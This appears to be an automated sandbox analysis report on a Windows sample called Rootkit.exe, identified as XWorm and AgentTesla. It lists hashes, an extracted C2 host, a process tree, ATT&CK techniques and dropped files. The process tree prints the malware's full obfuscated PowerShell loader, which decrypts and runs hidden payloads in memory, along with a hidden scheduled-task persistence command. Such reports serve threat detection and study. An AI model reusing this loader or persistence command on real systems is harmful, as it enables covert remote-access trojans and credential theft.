Overview

overview

10

Static

static

3

Rootkit.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    1s
  • max time network
    34s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 13:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Rootkit.exe

  • Size

    5.2MB

  • MD5

    bb3ad62baa943e12858845f450b52d45

  • SHA1

    106833ebedf630c67848569b953b58d734bfbc4f

  • SHA256

    696493dcbdadaac33f562d957dcbdcad65993bbbdafa020dd910c797873ebb9d

  • SHA512

    a84fb4ace43c878df83c39a8058dd336583ac81225760aad031b04e0039bfde356eae23af689f6e62030da4fd55690f29d80fbf5eaf1bc7cbeac47be559e987c

  • SSDEEP

    98304:uIHjlOot0eJu8/Zh84XB5D3DPJNNlQwGPth3rhV6Po0gpFvjM:XpOodumZhjBVDBNN65tZ9BHr

Score
10/10
agentteslaxwormexecutionkeyloggerratspywarestealerthemidatrojan

Malware Config

Extracted

Family

xworm

C2

session-chief.gl.at.ply.gg:36125

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • AgentTesla payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Rootkit.exe
    "C:\Users\Admin\AppData\Local\Temp\Rootkit.exe"
    1⤵
      PID:4820
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "
        2⤵
          PID:2248
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            PID:4396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_44_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_44.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:5104
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_44.vbs"
              4⤵
                PID:4312
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_44.bat" "
                  5⤵
                    PID:4400
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Roaming\startup_str_44.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:4752
            • C:\Users\Admin\AppData\Local\SpyderCrypter.exe
              "C:\Users\Admin\AppData\Local\SpyderCrypter.exe"
              2⤵
                PID:728

            Network

            MITRE ATT&CK Matrix ATT&CK v13

            Initial Access

            Execution

            Command and Scripting Interpreter

            1
            T1059

            PowerShell

            1
            T1059.001

            Persistence

            Privilege Escalation

            Defense Evasion

            Credential Access

            Discovery

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Web Service

            1
            T1102

            Impact

            Resource Development

            Reconnaissance

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              3KB

              MD5

              661739d384d9dfd807a089721202900b

              SHA1

              5b2c5d6a7122b4ce849dc98e79a7713038feac55

              SHA256

              70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

              SHA512

              81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              3c2a00f0fd823b88bf228b8472979845

              SHA1

              5dcc2f4e9282bdeb5d9f1b4ff6e790b8636d1482

              SHA256

              aaabc9856198107bc7a94bff5bcba1cd02e7adc24527e8794300e57ee7dd2ba4

              SHA512

              7f90eedab256355659676eddfa504a6fb08f016c610166b4abbea5b0d6a94a1c834ebae011eefdd68e23df4558c3a72c33ef887de7d62d70ea179bbd8b01fce9

              Download Submit
            • C:\Users\Admin\AppData\Local\SpyderCrypter.exe
              Filesize

              1.7MB

              MD5

              6f469fbde4beccd5414d8cf074fbac5c

              SHA1

              9ddff8409b73a606265e2af867700a09fe8c6f29

              SHA256

              4d4c79649623e2f1df7333fba0719e2bcab780b54195573f72e89b7f17d9745c

              SHA512

              f3230224fe158693995cc74cd164731e77197562604a30feb4fe3ef86f6c770ea238d8012aabf4a61174aabd71a5001edb9a5338deb021cc599f5a85069cdfc4

              Download Submit
            • C:\Users\Admin\AppData\Local\SpyderCrypter.exe
              Filesize

              1.2MB

              MD5

              d4f5ba2752470f66cd3fad4f3632ff80

              SHA1

              61d983b82ae81e1e1d974749a55736a52adbdf9a

              SHA256

              e421f19253131c2f87221840dc4c3c88aa0a3d2e1a9b68b8fa015adb84afab9d

              SHA512

              46557f35c34f2612fdac835aa3a6d56280a8f66783bc7424978bbca8513b20842bf9f8f9dc8fa7e18c79927eef21f1e6eb4a5d803669d8c6d8de0bcd969cea8c

              Download Submit
            • C:\Users\Admin\AppData\Local\SpyderCrypter.exe
              Filesize

              1.4MB

              MD5

              3519b16f3a49393c3d9ce298fe030ca5

              SHA1

              d915e3788205e5c5d43cfc0287acb0b6cf19db89

              SHA256

              28ddafd4a8e8cc5d5cde37ddf3f6239b4f2510cd1bd6e659cbb9cb841800abeb

              SHA512

              088b3987bb93b761a2fd213eaf3c2f6e8da8ead1709e22747360506ee93e2e8fc10a4450ec02a31a575291cc11f43d5090cf4c0ba888243b2db01297998c228c

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2idkmm4.fti.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit
            • C:\Users\Admin\AppData\Local\svchost.bat
              Filesize

              287KB

              MD5

              9be1452fccb6a9ca2b3e28b89d0c879e

              SHA1

              8fe95b338be85b1ceac233a51abf3c59890741a7

              SHA256

              fa57646f828af97268c76a06db56ef3c7dbc6c87d8b3a49579783b346c1ef6b6

              SHA512

              f2376350ff5e8b5c405c3e48370a22d140249c77a3c5b69f88e55c87f5f643f501a95f1dcf3e361619562ca4fdefa403caed95cb26bb6250c4a62a270803474f

              Download Submit
            • C:\Users\Admin\AppData\Roaming\startup_str_44.vbs
              Filesize

              114B

              MD5

              5618b50be7ed58e1ddf340dc9b0c8cec

              SHA1

              a98e2497af8e110438d727f02e6a0375a378ad4c

              SHA256

              a227ea8019965528a5e3b5a8b8f3ebb17cceaaa493ceb895a1285aa38455be11

              SHA512

              31857325a9bb6713a6df044c4be291333ccefaa62b4edb4ba69d671c3c2de509143760b10ea84f1c8b121ec4723982f8941a95f5f413bbdc6a89dc8c15c108ca

              Download Submit
            • memory/728-20-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-38-0x0000000000290000-0x0000000000C9C000-memory.dmp
              Filesize

              10.0MB

              Download
            • memory/728-22-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-24-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-23-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-25-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-85-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-84-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-80-0x0000000077580000-0x0000000077581000-memory.dmp
              Filesize

              4KB

              Download
            • memory/728-78-0x0000000000290000-0x0000000000C9C000-memory.dmp
              Filesize

              10.0MB

              Download
            • memory/728-40-0x0000000000290000-0x0000000000C9C000-memory.dmp
              Filesize

              10.0MB

              Download
            • memory/728-41-0x0000000005E10000-0x00000000063B4000-memory.dmp
              Filesize

              5.6MB

              Download
            • memory/728-42-0x0000000005710000-0x00000000057A2000-memory.dmp
              Filesize

              584KB

              Download
            • memory/728-21-0x0000000077560000-0x0000000077650000-memory.dmp
              Filesize

              960KB

              Download
            • memory/728-54-0x00000000056B0000-0x00000000056BA000-memory.dmp
              Filesize

              40KB

              Download
            • memory/728-55-0x0000000005B10000-0x0000000005D24000-memory.dmp
              Filesize

              2.1MB

              Download
            • memory/728-19-0x0000000077580000-0x0000000077581000-memory.dmp
              Filesize

              4KB

              Download
            • memory/728-17-0x0000000000290000-0x0000000000C9C000-memory.dmp
              Filesize

              10.0MB

              Download
            • memory/728-79-0x0000000008820000-0x00000000088D0000-memory.dmp
              Filesize

              704KB

              Download
            • memory/4396-43-0x000002227A440000-0x000002227A478000-memory.dmp
              Filesize

              224KB

              Download
            • memory/4396-39-0x000002225F930000-0x000002225F938000-memory.dmp
              Filesize

              32KB

              Download
            • memory/4396-33-0x000002227A1D0000-0x000002227A1F2000-memory.dmp
              Filesize

              136KB

              Download
            • memory/4752-77-0x0000024C7F540000-0x0000024C7F556000-memory.dmp
              Filesize

              88KB

              Download
            • memory/4820-1-0x00000000002A0000-0x00000000007D2000-memory.dmp
              Filesize

              5.2MB

              Download
            • memory/4820-0-0x00007FFCE8BB3000-0x00007FFCE8BB5000-memory.dmp
              Filesize

              8KB

              Download